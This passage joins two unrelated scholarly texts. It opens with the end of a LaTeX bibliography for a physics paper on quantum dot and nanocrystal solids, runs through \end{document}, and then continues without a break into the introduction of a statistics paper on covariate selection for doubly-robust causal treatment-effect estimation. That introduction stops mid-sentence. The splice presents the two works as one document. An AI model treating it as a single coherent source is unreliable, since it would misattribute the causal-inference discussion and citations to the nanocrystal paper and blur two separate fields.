{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Oh \latin{et~al.}(2014)Oh, Berry, Choi, Gaulding, Lin, Paik, Diroll,
Muramoto, Murray, and Kagan]{Kagan_ALD_NC_2014}
Oh,~S.~J.; Berry,~N.~E.; Choi,~J.-H.; Gaulding,~E.~A.; Lin,~H.; Paik,~T.;
Diroll,~B.~T.; Muramoto,~S.; Murray,~C.~B.; Kagan,~C.~R. Designing
High-Performance {PbS} and {PbSe} Nanocrystal Electronic Devices through
Stepwise, Post-Synthesis, Colloidal Atomic Layer Deposition. \emph{Nano
Letters} \textbf{2014}, \emph{14}, 1559--1566\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Delerue(2016)]{Review_NC__touching_array}
Delerue,~C. Nanocrystal Solids: Order and Progress. \emph{Nat. Mater.}
\textbf{2016}, \emph{15}, 498--499\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Williams \latin{et~al.}(2009)Williams, Tisdale, Leschkies, Haugstad,
Norris, Aydil, and Zhu]{strong_coupling_superlattice}
Williams,~K.~J.; Tisdale,~W.~A.; Leschkies,~K.~S.; Haugstad,~G.; Norris,~D.~J.;
Aydil,~E.~S.; Zhu,~X.-Y. Strong Electronic Coupling in Two-Dimensional
Assemblies of Colloidal {PbSe} Quantum Dots. \emph{ACS Nano} \textbf{2009},
\emph{3}, 1532--1538\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Walravens \latin{et~al.}(2016)Walravens, Roo, Drijvers, ten Brinck,
Solano, Dendooven, Detavernier, Infante, and Hens]{QD_epitaxial_conneccted}
Walravens,~W.; Roo,~J.~D.; Drijvers,~E.; ten Brinck,~S.; Solano,~E.;
Dendooven,~J.; Detavernier,~C.; Infante,~I.; Hens,~Z. Chemically Triggered
Formation of Two-Dimensional Epitaxial Quantum Dot Superlattices. \emph{ACS
Nano} \textbf{2016}, \emph{10}, 6861--6870\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Baumgardner \latin{et~al.}(2013)Baumgardner, Whitham, and
Hanrath]{lattice_NC_Tobias}
Baumgardner,~W.~J.; Whitham,~K.; Hanrath,~T. Confined-but-Connected Quantum
Solids \emph{via} Controlled Ligand Displacement. \emph{Nano Lett.} \textbf{2013},
\emph{13}, 3225--3231\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Sandeep \latin{et~al.}(2014)Sandeep, Azpiroz, Evers, Boehme, Moreels,
Kinge, Siebbeles, Infante, and Houtepen]{facet_PbSE_mobility_2}
Sandeep,~C. S.~S.; Azpiroz,~J.~M.; Evers,~W.~H.; Boehme,~S.~C.; Moreels,~I.;
Kinge,~S.; Siebbeles,~L. D.~A.; Infante,~I.; Houtepen,~A.~J. Epitaxially
Connected {PbSe} Quantum-Dot Films: Controlled Neck Formation and
Optoelectronic Properties. \emph{ACS Nano} \textbf{2014}, \emph{8},
11499--11511\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Li \latin{et~al.}(2016)Li, Zhitomirsky, Dave, and
Grossman]{facet_PbSE_mobility_1}
Li,~H.; Zhitomirsky,~D.; Dave,~S.; Grossman,~J.~C. Toward the Ultimate Limit of
Connectivity in Quantum Dots with High Mobility and Clean Gaps. \emph{ACS
Nano} \textbf{2016}, \emph{10}, 606--614\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Whitham \latin{et~al.}(2016)Whitham, Yang, Savitzky, Kourkoutis, Wise,
and Hanrath]{transport_lattice_QD}
Whitham,~K.; Yang,~J.; Savitzky,~B.~H.; Kourkoutis,~L.~F.; Wise,~F.;
Hanrath,~T. Charge Transport And Localization In Atomically Coherent Quantum
Dot Solids. \emph{Nat. Mater.} \textbf{2016}, \emph{15}, 557--563\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Evers \latin{et~al.}(2015)Evers, Schins, Aerts, Kulkarni, Capiod,
Berthe, Grandidier, Delerue, van~der Zant, van Overbeek, Peters,
Vanmaekelbergh, and Siebbeles]{lattice_NC_Vanmaekelbergh_THzmobility}
Evers,~W.~H.; Schins,~J.~M.; Aerts,~M.; Kulkarni,~A.; Capiod,~P.; Berthe,~M.;
Grandidier,~B.; Delerue,~C.; van~der Zant,~H. S.~J.; van Overbeek,~C.; Peters,~J.~L.
;Vanmaekelbergh,~D.; Siebbeles~L.~D.~A.
High Charge Mobility in Two-Dimensional Percolative Networks
of {PbSe} Quantum Dots Connected by Atomic Bonds. \emph{Nat. Commun.}
\textbf{2015}, \emph{6}, 8195\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Jang \latin{et~al.}(2015)Jang, Dolzhnikov, Liu, Nam, Shim, and
Talapin]{Talapin_NCs_bridges}
Jang,~J.; Dolzhnikov,~D.~S.; Liu,~W.; Nam,~S.; Shim,~M.; Talapin,~D.~V.
Solution-Processed Transistors Using Colloidal Nanocrystals with
Composition-Matched Molecular {\textquotedblleft}Solders{\textquotedblright}:
Approaching Single Crystal Mobility. \emph{Nano Lett.} \textbf{2015},
\emph{15}, 6309--6317\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Fu \latin{et~al.}(2016)Fu, Reich, and
Shklovskii]{localization_length_NC}
Fu,~H.; Reich,~K.~V.; Shklovskii,~B.~I. Hopping Conductivity and
Insulator-Metal Transition in Films of Touching Semiconductor Nanocrystals.
\emph{Phys. Rev. B} \textbf{2016}, \emph{93}, 125430\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Chen \latin{et~al.}(2016)Chen, Reich, Kramer, Fu, Kortshagen, and
Shklovskii]{Ting_MIT}
Chen,~T.; Reich,~K.~V.; Kramer,~N.~J.; Fu,~H.; Kortshagen,~U.~R.;
Shklovskii,~B.~I. Metal-Insulator Transition in Films of Doped Semiconductor
Nanocrystals. \emph{Nat. Mater.} \textbf{2016}, \relax
\mciteBstWouldAddEndPunctfalse
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Kagan \latin{et~al.}(1996)Kagan, Murray, and
Bawendi]{Kagan_Foster_CdSe}
Kagan,~C.~R.; Murray,~C.~B.; Bawendi,~M.~G. Long-Range Resonance Transfer of
Electronic Excitations in Close-Packed {CdSe} Quantum-Dot Solids. \emph{Phys.
Rev. B} \textbf{1996}, \emph{54}, 8633--8643\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Crooker \latin{et~al.}(2002)Crooker, Hollingsworth, Tretiak, and
Klimov]{Klimov_exciton_transfer}
Crooker,~S.~A.; Hollingsworth,~J.~A.; Tretiak,~S.; Klimov,~V.~I. Spectrally
Resolved Dynamics of Energy Transfer in Quantum-Dot Assemblies: Towards
Engineered Energy Flows in Artificial Materials. \emph{Phys. Rev. Lett.}
\textbf{2002}, \emph{89}, 186802\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Miyazaki and Kinoshita(2012)Miyazaki, and
Kinoshita]{Kinoshita_exciton_hopping}
Miyazaki,~J.; Kinoshita,~S. Site-Selective Spectroscopic Study on the Dynamics
of Exciton Hopping in an Array of Inhomogeneously Broadened Quantum Dots.
\emph{Phys. Rev. B} \textbf{2012}, \emph{86}, 035303\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Achermann \latin{et~al.}(2003)Achermann, Petruska, Crooker, and
Klimov]{Klimov_Foster}
Achermann,~M.; Petruska,~M.~A.; Crooker,~S.~A.; Klimov,~V.~I. Picosecond Energy
Transfer in Quantum Dot Langmuir--Blodgett Nanoassemblies. \emph{J. Phys. Chem. B}
\textbf{2003}, \emph{107}, 13782--13787\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Kholmicheva \latin{et~al.}(2015)Kholmicheva, Moroz, Bastola,
Razgoniaeva, Bocanegra, Shaughnessy, Porach, Khon, and
Zamkov]{Zamkov_exciton_diffusion}
Kholmicheva,~N.; Moroz,~P.; Bastola,~E.; Razgoniaeva,~N.; Bocanegra,~J.;
Shaughnessy,~M.; Porach,~Z.; Khon,~D.; Zamkov,~M. Mapping the Exciton
Diffusion in Semiconductor Nanocrystal Solids. \emph{ACS Nano} \textbf{2015},
\emph{9}, 2926--2937\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Poulikakos \latin{et~al.}(2014)Poulikakos, Prins, and
Tisdale]{Tisdale_exciton_migration}
Poulikakos,~L.~V.; Prins,~F.; Tisdale,~W.~A. Transition from Thermodynamic to
Kinetic-Limited Excitonic Energy Migration in Colloidal Quantum Dot Solids.
\emph{J. Phys. Chem. C} \textbf{2014}, \emph{118},
7894--7900\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Crisp \latin{et~al.}(2013)Crisp, Schrauben, Beard, Luther, and
Johnson]{uben_Beard_Luther_Johnson_2013}
Crisp,~R.~W.; Schrauben,~J.~N.; Beard,~M.~C.; Luther,~J.~M.; Johnson,~J.~C.
Coherent Exciton Delocalization in Strongly Coupled Quantum Dot Arrays.
\emph{Nano Lett.} \textbf{2013}, \emph{13}, 4862--4869\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Mork \latin{et~al.}(2014)Mork, Weidman, Prins, and
Tisdale]{Tisdale_Foster_radius}
Mork,~A.~J.; Weidman,~M.~C.; Prins,~F.; Tisdale,~W.~A. Magnitude of the
{F}{\"o}rster Radius in Colloidal Quantum Dot Solids. \emph{J. Phys. Chem. C}
\textbf{2014}, \emph{118}, 13920--13928\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Akselrod \latin{et~al.}(2014)Akselrod, Prins, Poulikakos, Lee,
Weidman, Mork, Willard, Bulovic, and Tisdale]{Tisdale_subdiffusive_transport}
Akselrod,~G.~M.; Prins,~F.; Poulikakos,~L.~V.; Lee,~E. M.~Y.; Weidman,~M.~C.;
Mork,~A.~J.; Willard,~A.~P.; Bulovic,~V.; Tisdale,~W.~A. Subdiffusive Exciton
Transport in Quantum Dot Solids. \emph{Nano Lett.} \textbf{2014},
\emph{14}, 3556--3562\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Murray \latin{et~al.}(2000)Murray, Kagan, and
Bawendi]{Murray-AnnuRev30-2000}
Murray,~C.~B.; Kagan,~C.~R.; Bawendi,~M.~G. Synthesis And Characterization Of
Monodisperse Nanocrystals And Close-Packed Nanocrystal Assemblies.
\emph{Annu. Rev. Mater. Sci.} \textbf{2000}, \emph{30},
545--610\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Kalesaki \latin{et~al.}(2014)Kalesaki, Delerue, Morais~Smith,
Beugeling, Allan, and Vanmaekelbergh]{Delerue_band}
Kalesaki,~E.; Delerue,~C.; Morais~Smith,~C.; Beugeling,~W.; Allan,~G.;
Vanmaekelbergh,~D. Dirac Cones, Topological Edge States, and Nontrivial Flat
Bands in Two-Dimensional Semiconductors with a Honeycomb Nanogeometry.
\emph{Phys. Rev. X} \textbf{2014}, \emph{4}, 011010\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Kalesaki \latin{et~al.}(2013)Kalesaki, Evers, Allan, Vanmaekelbergh,
and Delerue]{Delerue_2D_band}
Kalesaki,~E.; Evers,~W.~H.; Allan,~G.; Vanmaekelbergh,~D.; Delerue,~C.
Electronic Structure of Atomically Coherent Square Semiconductor
Superlattices with Dimensionality Below Two. \emph{Phys. Rev. B}
\textbf{2013}, \emph{88}, 115431\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Beugeling \latin{et~al.}(2015)Beugeling, Kalesaki, Delerue, Niquet,
Vanmaekelbergh, and Smith]{Delerue_topology_2D}
Beugeling,~W.; Kalesaki,~E.; Delerue,~C.; Niquet,~Y.-M.; Vanmaekelbergh,~D.;
Smith,~C.~M. Topological States in Multi-Orbital {HgTe} Honeycomb Lattices.
\emph{Nat. Commun.} \textbf{2015}, \emph{6}, 6316\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Madelung(2013)]{978-3-642-62332-5}
Madelung,~O. \emph{Semiconductors: Data Handbook}; Springer: New York, 2004\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Reich and Shklovskii(2016)Reich, and
Shklovskii]{dielectric_constant_touching_NC}
Reich,~K.~V.; Shklovskii,~B.~I. Dielectric Constant and Charging Energy in
Array of Touching Nanocrystals. \emph{Appl. Phys. Lett.} \textbf{2016},
\emph{108}, 113104\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Nirmal \latin{et~al.}(1995)Nirmal, Norris, Kuno, Bawendi, Efros, and
Rosen]{Efros_dark_exciton}
Nirmal,~M.; Norris,~D.~J.; Kuno,~M.; Bawendi,~M.~G.; Efros,~A.~L.; Rosen,~M.
Observation of the "Dark Exciton" in {CdSe} Quantum Dots. \emph{Phys. Rev.
Lett.} \textbf{1995}, \emph{75}, 3728--3731\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Dexter(1953)]{Dexter_transfer}
Dexter,~D.~L. A Theory of Sensitized Luminescence in Solids. \emph{J. Chem. Phys.}
\textbf{1953}, \emph{21}, 836--850\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Liu \latin{et~al.}(2015)Liu, Rodina, Yakovlev, Golovatenko, Greilich,
Vakhtin, Susha, Rogach, Kusrayev, and Bayer]{energy_transport_NC_Rodina}
Liu,~F.; Rodina,~A.~V.; Yakovlev,~D.~R.; Golovatenko,~A.~A.; Greilich,~A.;
Vakhtin,~E.~D.; Susha,~A.; Rogach,~A.~L.; Kusrayev,~Y.~G.; Bayer,~M.
F\"orster Energy Transfer of Dark Excitons Enhanced by a Magnetic Field in an
Ensemble of {CdTe} Colloidal Nanocrystals. \emph{Phys. Rev. B} \textbf{2015},
\emph{92}, 125403\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Blumling \latin{et~al.}(2012)Blumling, Tokumoto, McGill, and
Knappenberger]{Exciton_CdSe_H_T}
Blumling,~D.~E.; Tokumoto,~T.; McGill,~S.; Knappenberger,~K.~L. Temperature-
and Field-Dependent Energy Transfer in {CdSe} Nanocrystal Aggregates Studied
by Magneto-Photoluminescence Spectroscopy. \emph{Phys. Chem. Chem. Phys.}
\textbf{2012}, \emph{14}, 11053\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Landau and Lifshits(1977)Landau, and Lifshits]{landau_quantum}
Landau,~L.; Lifshits,~E. \emph{Quantum Mechanics: Non-relativistic Theory};
Butterworth Heinemann: New-York, 1977\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Moskalenko and Yassievich(2004)Moskalenko, and
Yassievich]{Yassievich_excitons_Si}
Moskalenko,~A.~S.; Yassievich,~I.~N. Excitons in {Si} Nanocrystals.
\emph{Phys. Solid State} \textbf{2004}, \emph{46}, 1508--1519\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Burdov(2002)]{Holes_electrons_NCs}
Burdov,~V.~A. Electron and Hole Spectra of Silicon Quantum Dots. \emph{J. Exp. Theor. Phys.}
\textbf{2002}, \emph{94},
411--418\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Allan and Delerue(2007)Allan, and Delerue]{Delerue_Foster_NC}
Allan,~G.; Delerue,~C. Energy Transfer Between Semiconductor Nanocrystals:
Validity of {F}{\"o}rster's Theory. \emph{Phys. Rev. B} \textbf{2007},
\emph{75}\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Poddubny and Rodina(2016)Poddubny, and Rodina]{Forster_Rodina}
Poddubny,~A.~N.; Rodina,~A.~V. Nonradiative and Radiative {F}{\"o}rster Energy
Transfer Between Quantum Dots. \emph{J. Exp. Theor. Phys.} \textbf{2016}, \emph{122}, 531--538\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Blood(2015)]{laser_devices_Blood}
Blood,~P. \emph{Quantum Confined Laser Devices: Optical gain and recombination
in semiconductors}; Oxford University Press: Oxford, 2015\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Efros and Rosen(2000)Efros, and Rosen]{Efros_review_NCs}
Efros,~A.~L.; Rosen,~M. The Electronic Structure of Semiconductor Nanocrystals.
\emph{Annu. Rev. Mater. Sci.} \textbf{2000}, \emph{30},
475--521\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Anderson(1963)]{Anderson_potential_kinetic_exchange}
Anderson,~P.~W. In \emph{Solid State Physics}; Seitz,~F., Turnbull,~D., Eds.;
Academic Press: New-York, 1963; Vol.~14; pp 99 -- 214\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Kang and Wise(1997)Kang, and Wise]{Wise_PbSe}
Kang,~I.; Wise,~F.~W. Electronic Structure and Optical Properties of {PbS} and
{PbSe} Quantum Dots. \emph{J. Opt. Soc. Am. B} \textbf{1997}, \emph{14},
1632--1646\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Wang \latin{et~al.}(1987)Wang, Suna, Mahler, and
Kasowski]{PbS_spectrum}
Wang,~Y.; Suna,~A.; Mahler,~W.; Kasowski,~R. {PbS} in Polymers. From Molecules
to Bulk Solids. \emph{J. Chem. Phys.} \textbf{1987},
\emph{87}, 7315--7322\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Allan and Delerue(2004)Allan, and Delerue]{PbSe_NC_spectrum_Delerue}
Allan,~G.; Delerue,~C. Confinement Effects in {PbSe} Quantum Wells and
Nanocrystals. \emph{Phys. Rev. B} \textbf{2004}, \emph{70}\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Rayleigh(1897)]{Rayleigh_diffraction_aperure}
Rayleigh,~F. R.~S. On the Passage of Waves Through Apertures in Plane Screens,
and Allied Problems. \emph{Philos. Mag. (1798-1977)} \textbf{1897},
\emph{43}, 259--272\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Spencer Domina~Eberle(1988)]{9780387184302}
Moon, P.; Spencer, D.E. \emph{Field Theory Handbook: Including
Coordinate Systems- Differential Equations- and Their Solutions}; A
Springer-Verlag Telos: New-York, 1988\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Zhang and Shklovskii(2004)Zhang, and Shklovskii]{PhysRevB.70.115317}
Zhang,~J.; Shklovskii,~B.~I. Density of States and Conductivity of a Granular
Metal or an Array of Quantum Dots. \emph{Phys. Rev. B} \textbf{2004},
\emph{70}, 115317\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\bibitem[Guttmann(2010)]{Lattice_green_function}
Guttmann,~A.~J. Lattice Green's Functions in All Dimensions. \emph{J. Phys. A: Math. Theor.}
\textbf{2010}, \emph{43},
305205\relax
\mciteBstWouldAddEndPuncttrue
\mciteSetBstMidEndSepPunct{\mcitedefaultmidpunct}
{\mcitedefaultendpunct}{\mcitedefaultseppunct}\relax
\unskip.}
\end{mcitethebibliography}
\end{document}
While randomized clinical trials (RCT) remain the gold standard, large-scale observational data such as electronic medical record (EMR), mobile health, and insurance claims data are playing an increasing role in evaluating treatments in biomedical studies. Such observational data are valuable because they can be collected in contexts where RCTs cannot be run due to cost, ethical, or other feasibility issues \citep{rosenbaum2002observational}.
In the absence of randomization, adjustment for covariates $\mathbf{X}$ that satisfy ``no unmeasured confounding'' (or ``ignorability'' or ``exchangeability'') assumptions is needed to avoid bias from confounding. Many methods based on propensity score (PS), outcome regression, or a combination have been developed to estimate treatment effects under these assumptions (for a review of the basic approaches see \cite{lunceford2004stratification} and \cite{kang2007demystifying}). These methods were initially developed in settings where $p$, the dimension of $\mathbf{X}$, was small relative to the sample size $n$. Modern observational data however tend to include a large number of variables with little prior knowledge known about them.
Regardless of the size of $p$, adjustment for different covariates among all observed $\mathbf{X}$ yields different effects. Let $\mathcal{A}_{\pi}$ index the subset of $\mathbf{X}$ that contributes to the PS $\pi_1(\mathbf{x})=\mathbb P(T=1\mid\mathbf{X}=\mathbf{x})$, where $T\in\{0,1\}$ is the treatment. Let $\mathcal{A}_{\mu}$ index the subset of $\mathbf{X}$ contributing to either $\mu_1(\mathbf{x})$ or $\mu_0(\mathbf{x})$, where $\mu_k(\mathbf{x}) = \mathbb E(Y\mid \mathbf{X}=\mathbf{x},T=k)$ and $Y$ is an outcome.
Beyond adjusting for covariates indexed in $\mathcal{A}_{\pi} \cap \mathcal{A}_{\mu}$ to mitigate confounding, it is well-known that adjusting for covariates in $\mathcal{A}_{\pi}^c\cap\mathcal{A}_{\mu}$ improves the efficiency of PS-based treatment effect estimators, whereas adjusting for covariates in $\mathcal{A}_{\pi}\cap\mathcal{A}_{\mu}^c$ decreases efficiency \citep{lunceford2004stratification,hahn2004functional,brookhart2006variable,rotnitzky2010note,de2011covariate}.
This parallels similar phenomena that occur when adjusting for covariates in regression \citep{tsiatis2008covariate,de2008consequences}.
Early studies using PS-based approaches cautioned against excluding variables among $\mathbf{X}$ to avoid incurring bias from excluding confounders despite potential efficiency loss \citep{perkins2000use,rubin1996matching}.
\cite{vanderweele2011new} proposed a simple criteria to adjust for covariates that are known to be either a cause of $T$ or $Y$. These strategies are not feasible when $p$ is large.
Initial data-driven approaches based on screening marginal associations of covariates in $\mathbf{X}$ with $T$ and $Y$ were considered in \cite{schneeweiss2009high} and \cite{hirano2001estimation}. These approaches, however, can be misleading because marginal associations need not agree with conditional associations. \cite{vansteelandt2012model} and \cite{gruber2015consistent} distinguish the problem of variable selection for estimating causal effects from variable selection for building predictive models and propose stepwise procedures focusing on optimizing treatment effect estimation.
More recently, a number of authors considered regularization methods for variable selection in treatment effect estimation. For example, \cite{belloni2013inference} estimated the joint support $\mathcal{A}_{\pi}\cup\mathcal{A}_{\mu}$ through regularization and obtained treatment effects through a partially linear regression model. \cite{belloni2017program} then considered estimating treatment effects using orthogonal estimating equations (i.e. those of the doubly-robust (DR) estimator \citep{robins1994estimation}) using regularization to estimate models for $\pi_1(\mathbf{x})$ and $\mu_k(\mathbf{x})$. \cite{farrell2015robust} similarly considers estimating treatment effects with the DR estimator using group LASSO to group main and interaction effects in the outcome model. These papers focus on developing theory for existing treatment effect estimators to allow for valid inferences following variable selection. \cite{wilson2014confounder} considered estimating $\mathcal{A}_{\pi} \cup \mathcal{A}_{\mu}$ through a regularized loss function, which simplifies to an adaptive LASSO \citep{zou2006adaptive} problem with a modified penalty that selects out covariates not conditionally associated with either $T$ or $Y$. Treatment effects are estimated through an outcome model after selection. \cite{shortreed2017outcome} proposed an approach that also modifies the weights in an adaptive LASSO for a PS model to select out covariates in $\mathcal{A}_{\pi}\cap\mathcal{A}_{\mu}^c$, estimating the final treatment effect through an inverse probability weighting (IPW) estimator. These approaches modify existing regularization techniques to identify relevant covariates, but there is limited theory to support their performance compared to existing causal inference estimators used with regularization. Furthermore, by relying exclusively on PS- and outcome regression-based approaches to estimate the treatment effect in the end, the double-robustness property is often forfeited.
Alternatively, \cite{koch2017covariate} proposed an adaptive group LASSO to estimate models for $\pi_k(\mathbf{x})$ and $\mu_k(\mathbf{x})$ through simultaneously minimizing the sum of their loss functions with a group LASSO penalty grouping together coefficients between the models for the same covariate. The penalty is also weighted by the inverse of the association between each covariate and $Y$ from an initial outcome model to select out covariates belonging to $\mathcal{A}_{\pi}\cap\mathcal{A}_{\mu}^c$. The estimated nuisance functions are plugged into the standard doubly-robust estimator to estimate the treatment effect. However, selecting out covariates in $\mathcal{A}_{\pi}\cap\mathcal{A}_{\mu}^c$ may inadvertently induce a misspecified model for $\pi_1(\mathbf{x})$ when it is in fact correctly specified given covariates indexed in $\mathcal{A}_{\pi}$. Moreover, the asymptotic distribution of the resulting estimator has not been derived when the nuisance functions are estimated, making it difficult to compare its efficiency with other methods. Bayesian model averaging provides an alternative to regularization methods for variable selection in causal inference problems 